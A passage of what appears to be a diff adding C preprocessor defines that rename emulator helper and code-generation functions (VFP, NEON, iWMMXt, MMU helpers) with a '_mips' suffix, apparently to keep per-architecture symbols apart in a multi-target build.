gen_helper_uadd8_mips +#define gen_helper_uaddsubx gen_helper_uaddsubx_mips +#define gen_helper_udiv gen_helper_udiv_mips +#define gen_helper_uhadd16 gen_helper_uhadd16_mips +#define gen_helper_uhadd8 gen_helper_uhadd8_mips +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_mips +#define gen_helper_uhsub16 gen_helper_uhsub16_mips +#define gen_helper_uhsub8 gen_helper_uhsub8_mips +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mips +#define gen_helper_uqadd16 gen_helper_uqadd16_mips +#define gen_helper_uqadd8 gen_helper_uqadd8_mips +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mips 
+#define gen_helper_uqsub16 gen_helper_uqsub16_mips +#define gen_helper_uqsub8 gen_helper_uqsub8_mips +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mips +#define gen_helper_usad8 gen_helper_usad8_mips +#define gen_helper_usat gen_helper_usat_mips +#define gen_helper_usat16 gen_helper_usat16_mips +#define gen_helper_usub16 gen_helper_usub16_mips +#define gen_helper_usub8 gen_helper_usub8_mips +#define gen_helper_usubaddx gen_helper_usubaddx_mips +#define gen_helper_uxtb16 gen_helper_uxtb16_mips +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mips +#define gen_helper_v7m_msr gen_helper_v7m_msr_mips +#define gen_helper_vfp_absd gen_helper_vfp_absd_mips +#define gen_helper_vfp_abss gen_helper_vfp_abss_mips +#define gen_helper_vfp_addd gen_helper_vfp_addd_mips +#define gen_helper_vfp_adds gen_helper_vfp_adds_mips +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mips +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mips +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mips +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_mips +#define gen_helper_vfp_divd gen_helper_vfp_divd_mips +#define gen_helper_vfp_divs gen_helper_vfp_divs_mips +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mips +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mips +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mips +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mips +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_mips +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mips +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mips +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mips +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mips +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mips +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mips +#define gen_helper_vfp_mins gen_helper_vfp_mins_mips +#define 
gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mips +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mips +#define gen_helper_vfp_muld gen_helper_vfp_muld_mips +#define gen_helper_vfp_muls gen_helper_vfp_muls_mips +#define gen_helper_vfp_negd gen_helper_vfp_negd_mips +#define gen_helper_vfp_negs gen_helper_vfp_negs_mips +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mips +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mips +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mips +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mips +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mips +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mips +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mips +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mips +#define gen_helper_vfp_subd gen_helper_vfp_subd_mips +#define gen_helper_vfp_subs gen_helper_vfp_subs_mips +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mips +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mips +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mips +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mips +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mips +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mips +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_mips +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mips +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mips +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mips +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mips +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_mips +#define gen_helper_vfp_touid gen_helper_vfp_touid_mips +#define gen_helper_vfp_touis gen_helper_vfp_touis_mips +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mips +#define gen_helper_vfp_touizs 
gen_helper_vfp_touizs_mips +#define gen_helper_vfp_tould gen_helper_vfp_tould_mips +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mips +#define gen_helper_vfp_touls gen_helper_vfp_touls_mips +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mips +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mips +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mips +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mips +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mips +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mips +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mips +#define gen_helper_wfe gen_helper_wfe_mips +#define gen_helper_wfi gen_helper_wfi_mips +#define gen_hvc gen_hvc_mips +#define gen_intermediate_code_internal gen_intermediate_code_internal_mips +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mips +#define gen_iwmmxt_address gen_iwmmxt_address_mips +#define gen_iwmmxt_shift gen_iwmmxt_shift_mips +#define gen_jmp gen_jmp_mips +#define gen_load_and_replicate gen_load_and_replicate_mips +#define gen_load_exclusive gen_load_exclusive_mips +#define gen_logic_CC gen_logic_CC_mips +#define gen_logicq_cc gen_logicq_cc_mips +#define gen_lookup_tb gen_lookup_tb_mips +#define gen_mov_F0_vreg gen_mov_F0_vreg_mips +#define gen_mov_F1_vreg gen_mov_F1_vreg_mips +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mips +#define gen_muls_i64_i32 gen_muls_i64_i32_mips +#define gen_mulu_i64_i32 gen_mulu_i64_i32_mips +#define gen_mulxy gen_mulxy_mips +#define gen_neon_add gen_neon_add_mips +#define gen_neon_addl gen_neon_addl_mips +#define gen_neon_addl_saturate gen_neon_addl_saturate_mips +#define gen_neon_bsl gen_neon_bsl_mips +#define gen_neon_dup_high16 gen_neon_dup_high16_mips +#define gen_neon_dup_low16 gen_neon_dup_low16_mips +#define gen_neon_dup_u8 gen_neon_dup_u8_mips +#define gen_neon_mull gen_neon_mull_mips +#define gen_neon_narrow gen_neon_narrow_mips +#define 
gen_neon_narrow_op gen_neon_narrow_op_mips +#define gen_neon_narrow_sats gen_neon_narrow_sats_mips +#define gen_neon_narrow_satu gen_neon_narrow_satu_mips +#define gen_neon_negl gen_neon_negl_mips +#define gen_neon_rsb gen_neon_rsb_mips +#define gen_neon_shift_narrow gen_neon_shift_narrow_mips +#define gen_neon_subl gen_neon_subl_mips +#define gen_neon_trn_u16 gen_neon_trn_u16_mips +#define gen_neon_trn_u8 gen_neon_trn_u8_mips +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mips +#define gen_neon_unzip gen_neon_unzip_mips +#define gen_neon_widen gen_neon_widen_mips +#define gen_neon_zip gen_neon_zip_mips +#define gen_new_label gen_new_label_mips +#define gen_nop_hint gen_nop_hint_mips +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mips +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mips +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mips +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mips +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mips +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_mips +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mips +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mips +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mips +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mips +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_mips +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mips +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mips +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mips +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mips +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mips +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mips +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mips 
+#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mips +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mips +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mips +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mips +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mips +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mips +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mips +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mips +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mips +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_mips +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mips +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mips +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mips +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mips +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mips +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_mips +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mips +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mips +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mips +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mips +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mips +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mips +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mips +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mips +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mips 
+#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mips +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mips +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mips +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mips +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mips +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mips +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mips +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mips +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mips +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mips +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mips +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_mips +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_mips +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mips +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mips +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mips +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mips +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mips +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mips +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mips +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mips +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_mips +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mips +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mips +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mips +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mips +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mips +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mips +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mips +#define 
gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mips +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mips +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mips +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mips +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mips +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mips +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mips +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mips +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mips +#define gen_rev16 gen_rev16_mips +#define gen_revsh gen_revsh_mips +#define gen_rfe gen_rfe_mips +#define gen_sar gen_sar_mips +#define gen_sbc_CC gen_sbc_CC_mips +#define gen_sbfx gen_sbfx_mips +#define gen_set_CF_bit31 gen_set_CF_bit31_mips +#define gen_set_condexec gen_set_condexec_mips +#define gen_set_cpsr gen_set_cpsr_mips +#define gen_set_label gen_set_label_mips +#define gen_set_pc_im gen_set_pc_im_mips +#define gen_set_psr gen_set_psr_mips +#define gen_set_psr_im gen_set_psr_im_mips +#define gen_shl gen_shl_mips +#define gen_shr gen_shr_mips +#define gen_smc gen_smc_mips +#define gen_smul_dual gen_smul_dual_mips +#define gen_srs gen_srs_mips +#define gen_ss_advance gen_ss_advance_mips +#define gen_step_complete_exception gen_step_complete_exception_mips +#define gen_store_exclusive gen_store_exclusive_mips +#define gen_storeq_reg gen_storeq_reg_mips +#define gen_sub_carry gen_sub_carry_mips +#define gen_sub_CC gen_sub_CC_mips +#define gen_subq_msw gen_subq_msw_mips +#define gen_swap_half gen_swap_half_mips +#define gen_thumb2_data_op gen_thumb2_data_op_mips +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mips +#define gen_ubfx gen_ubfx_mips +#define gen_vfp_abs gen_vfp_abs_mips +#define gen_vfp_add gen_vfp_add_mips +#define gen_vfp_cmp gen_vfp_cmp_mips +#define gen_vfp_cmpe gen_vfp_cmpe_mips +#define gen_vfp_div gen_vfp_div_mips +#define 
gen_vfp_F1_ld0 gen_vfp_F1_ld0_mips +#define gen_vfp_F1_mul gen_vfp_F1_mul_mips +#define gen_vfp_F1_neg gen_vfp_F1_neg_mips +#define gen_vfp_ld gen_vfp_ld_mips +#define gen_vfp_mrs gen_vfp_mrs_mips +#define gen_vfp_msr gen_vfp_msr_mips +#define gen_vfp_mul gen_vfp_mul_mips +#define gen_vfp_neg gen_vfp_neg_mips +#define gen_vfp_shto gen_vfp_shto_mips +#define gen_vfp_sito gen_vfp_sito_mips +#define gen_vfp_slto gen_vfp_slto_mips +#define gen_vfp_sqrt gen_vfp_sqrt_mips +#define gen_vfp_st gen_vfp_st_mips +#define gen_vfp_sub gen_vfp_sub_mips +#define gen_vfp_tosh gen_vfp_tosh_mips +#define gen_vfp_tosi gen_vfp_tosi_mips +#define gen_vfp_tosiz gen_vfp_tosiz_mips +#define gen_vfp_tosl gen_vfp_tosl_mips +#define gen_vfp_touh gen_vfp_touh_mips +#define gen_vfp_toui gen_vfp_toui_mips +#define gen_vfp_touiz gen_vfp_touiz_mips +#define gen_vfp_toul gen_vfp_toul_mips +#define gen_vfp_uhto gen_vfp_uhto_mips +#define gen_vfp_uito gen_vfp_uito_mips +#define gen_vfp_ulto gen_vfp_ulto_mips +#define get_arm_cp_reginfo get_arm_cp_reginfo_mips +#define get_clock get_clock_mips +#define get_clock_realtime get_clock_realtime_mips +#define get_constraint_priority get_constraint_priority_mips +#define get_float_exception_flags get_float_exception_flags_mips +#define get_float_rounding_mode get_float_rounding_mode_mips +#define get_fpstatus_ptr get_fpstatus_ptr_mips +#define get_level1_table_address get_level1_table_address_mips +#define get_mem_index get_mem_index_mips +#define get_next_param_value get_next_param_value_mips +#define get_opt_name get_opt_name_mips +#define get_opt_value get_opt_value_mips +#define get_page_addr_code get_page_addr_code_mips +#define get_param_value get_param_value_mips +#define get_phys_addr get_phys_addr_mips +#define get_phys_addr_lpae get_phys_addr_lpae_mips +#define get_phys_addr_mpu get_phys_addr_mpu_mips +#define get_phys_addr_v5 get_phys_addr_v5_mips +#define get_phys_addr_v6 get_phys_addr_v6_mips +#define get_system_memory get_system_memory_mips 
+#define get_ticks_per_sec get_ticks_per_sec_mips +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mips +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mips +#define gt_cntfrq_access gt_cntfrq_access_mips +#define gt_cnt_read gt_cnt_read_mips +#define gt_cnt_reset gt_cnt_reset_mips +#define gt_counter_access gt_counter_access_mips +#define gt_ctl_write gt_ctl_write_mips +#define gt_cval_write gt_cval_write_mips +#define gt_get_countervalue gt_get_countervalue_mips +#define gt_pct_access gt_pct_access_mips +#define gt_ptimer_access gt_ptimer_access_mips +#define gt_recalc_timer gt_recalc_timer_mips +#define gt_timer_access gt_timer_access_mips +#define gt_tval_read gt_tval_read_mips +#define gt_tval_write gt_tval_write_mips +#define gt_vct_access gt_vct_access_mips +#define gt_vtimer_access gt_vtimer_access_mips +#define guest_phys_blocks_free guest_phys_blocks_free_mips +#define guest_phys_blocks_init guest_phys_blocks_init_mips +#define handle_vcvt handle_vcvt_mips +#define handle_vminmaxnm handle_vminmaxnm_mips +#define handle_vrint handle_vrint_mips +#define handle_vsel handle_vsel_mips +#define has_help_option has_help_option_mips +#define have_bmi1 have_bmi1_mips +#define have_bmi2 have_bmi2_mips +#define hcr_write hcr_write_mips +#define helper_access_check_cp_reg helper_access_check_cp_reg_mips +#define helper_add_saturate helper_add_saturate_mips +#define helper_add_setq helper_add_setq_mips +#define helper_add_usaturate helper_add_usaturate_mips +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mips +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_mips +#define helper_be_ldq_mmu helper_be_ldq_mmu_mips +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips +#define helper_be_ldul_mmu helper_be_ldul_mmu_mips +#define helper_be_lduw_mmu helper_be_lduw_mmu_mips +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mips +#define helper_be_stl_mmu helper_be_stl_mmu_mips +#define helper_be_stq_mmu 
helper_be_stq_mmu_mips +#define helper_be_stw_mmu helper_be_stw_mmu_mips +#define helper_clear_pstate_ss helper_clear_pstate_ss_mips +#define helper_clz_arm helper_clz_arm_mips +#define helper_cpsr_read helper_cpsr_read_mips +#define helper_cpsr_write helper_cpsr_write_mips +#define helper_crc32_arm helper_crc32_arm_mips +#define helper_crc32c helper_crc32c_mips +#define helper_crypto_aese helper_crypto_aese_mips +#define helper_crypto_aesmc helper_crypto_aesmc_mips +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mips +#define helper_crypto_sha1h helper_crypto_sha1h_mips +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mips +#define helper_crypto_sha256h helper_crypto_sha256h_mips +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mips +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mips +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mips +#define helper_dc_zva helper_dc_zva_mips +#define helper_double_saturate helper_double_saturate_mips +#define helper_exception_internal helper_exception_internal_mips +#define helper_exception_return helper_exception_return_mips +#define helper_exception_with_syndrome helper_exception_with_syndrome_mips +#define helper_get_cp_reg helper_get_cp_reg_mips +#define helper_get_cp_reg64 helper_get_cp_reg64_mips +#define helper_get_r13_banked helper_get_r13_banked_mips +#define helper_get_user_reg helper_get_user_reg_mips +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mips +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mips +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mips +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mips +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mips +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mips +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mips +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mips +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mips +#define helper_iwmmxt_addub helper_iwmmxt_addub_mips +#define helper_iwmmxt_addul 
helper_iwmmxt_addul_mips +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mips +#define helper_iwmmxt_align helper_iwmmxt_align_mips +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mips +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mips +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mips +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mips +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mips +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mips +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mips +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mips +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mips +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mips +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mips +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mips +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mips +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mips +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mips +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mips +#define helper_iwmmxt_insr helper_iwmmxt_insr_mips +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mips +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mips +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mips +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mips +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mips +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mips +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mips +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mips +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mips +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mips +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mips +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mips +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mips +#define helper_iwmmxt_minub helper_iwmmxt_minub_mips +#define helper_iwmmxt_minul helper_iwmmxt_minul_mips +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mips +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_mips 
+#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mips +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mips +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mips +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mips +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mips +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mips +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mips +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mips +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mips +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mips +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mips +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mips +#define helper_iwmmxt_packul helper_iwmmxt_packul_mips +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mips +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_mips +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mips +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mips +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_mips +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mips +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mips +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mips +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mips +#define helper_iwmmxt_slll helper_iwmmxt_slll_mips +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mips +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mips +#define helper_iwmmxt_sral helper_iwmmxt_sral_mips +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mips +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mips +#define helper_iwmmxt_srll helper_iwmmxt_srll_mips +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mips +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mips +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mips +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mips +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_mips +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mips +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mips +#define helper_iwmmxt_subsw 
